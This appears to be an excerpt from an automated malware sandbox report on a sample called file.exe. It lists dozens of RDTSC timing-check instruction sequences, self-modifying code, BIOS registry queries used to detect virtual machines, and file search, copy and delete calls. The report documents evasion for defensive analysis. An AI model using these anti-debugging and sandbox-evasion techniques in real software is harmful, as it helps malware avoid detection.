                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B262 second address: 118B267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B267 second address: 118B287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43F0D10397h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F52B second address: 118F546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D0DC72h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F546 second address: 118F54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F54C second address: 118F55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F43F0D0DC66h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F55D second address: 118F567 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F7CD second address: 118F7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC78h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F7EB second address: 118F7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F43F0D10386h 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FBDE second address: 118FBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC6Fh 0x00000009 pop esi 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F43F0D0DC66h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118FBFC second address: 118FC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119768F second address: 1197696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197696 second address: 11976AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D1038Eh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197EE5 second address: 1197EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119819E second address: 11981A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11981A2 second address: 11981A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11981A6 second address: 11981AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11981AC second address: 11981D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F43F0D0DC7Bh 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119849C second address: 11984A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F43F0D10386h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198783 second address: 11987B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Ch 0x00000007 jbe 00007F43F0D0DC7Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jl 00007F43F0D0DC66h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CBFB second address: 119CC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CC01 second address: 119CC27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43F0D0DC72h 0x0000000f jmp 00007F43F0D0DC6Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119CC27 second address: 119CC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C0AD second address: 119C0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C0B3 second address: 119C0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C526 second address: 119C52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65B second address: 119C65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65F second address: 119C68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F43F0D0DC88h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43F0D0DC74h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C7B8 second address: 119C7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C941 second address: 119C94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1A4E second address: 11A1A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4A7E second address: 11A4AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC6Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F43F0D0DC74h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4AA8 second address: 11A4AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB0EB second address: 11AB0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F43F0D0DC66h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB527 second address: 11AB52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB7F6 second address: 11AB7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB7FA second address: 11AB804 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB804 second address: 11AB80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB80A second address: 11AB833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D10392h 0x00000008 jmp 00007F43F0D10392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB833 second address: 11AB844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F43F0D0DC6Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABB01 second address: 11ABB11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007F43F0D10386h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABB11 second address: 11ABB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43F0D0DC66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABC96 second address: 11ABCBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F43F0D1038Bh 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnl 00007F43F0D10386h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABE38 second address: 11ABE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B280A second address: 11B280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B280E second address: 11B2822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jnp 00007F43F0D0DC72h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2822 second address: 11B2828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2828 second address: 11B2839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F43F0D0DC6Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29BB second address: 11B29D7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43F0D10386h 0x00000008 jmp 00007F43F0D10392h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29D7 second address: 11B29F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43F0D0DC74h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F43F0D0DC66h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29F9 second address: 11B2A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BDFAA second address: 11BDFC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D0DC6Ch 0x00000009 jmp 00007F43F0D0DC6Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3E95 second address: 11C3EAB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 jne 00007F43F0D10386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CC68E second address: 11CC694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B2F second address: 11D4B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B3C second address: 11D4B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B40 second address: 11D4B4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D68EE second address: 11D690F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43F0D0DC76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D690F second address: 11D6913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6913 second address: 11D6917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDE85 second address: 11DDE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E43DF second address: 11E43E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4524 second address: 11E4551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43F0D10388h 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jng 00007F43F0D10386h 0x00000015 pop ebx 0x00000016 popad 0x00000017 jl 00007F43F0D103AAh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jc 00007F43F0D10386h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200EFC second address: 1200F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E8B second address: 1210E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E8F second address: 1210E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E93 second address: 1210E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E9D second address: 1210EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210EA1 second address: 1210EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210EA5 second address: 1210EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC76h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121117F second address: 1211185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121185B second address: 1211893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F43F0D0DC79h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211893 second address: 12118A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F43F0D10388h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12118A1 second address: 12118AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43F0D0DC66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12118AB second address: 12118DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43F0D10391h 0x00000013 jmp 00007F43F0D10392h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214BBE second address: 1214BCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43F0D0DC6Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214BCD second address: 1214BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12174C9 second address: 12174CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12174CE second address: 12174D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F43F0D10386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12177BB second address: 12177C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12177C1 second address: 12177C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217A6B second address: 1217A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121918D second address: 12191CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F43F0D10386h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43F0D10393h 0x00000018 jmp 00007F43F0D10399h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12191CC second address: 12191D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0F1 second address: 121B0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0F5 second address: 121B0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10300 second address: 4F10318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D10394h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10318 second address: 4F1033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43F0D0DC70h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1033E second address: 4F1034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1034D second address: 4F10353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10353 second address: 4F10357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10357 second address: 4F10368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, ECC5h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10368 second address: 4F1036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1036E second address: 4F10398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43F0D0DC6Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138615 second address: 113861B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91B3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91A3E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 113E97C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D438B0
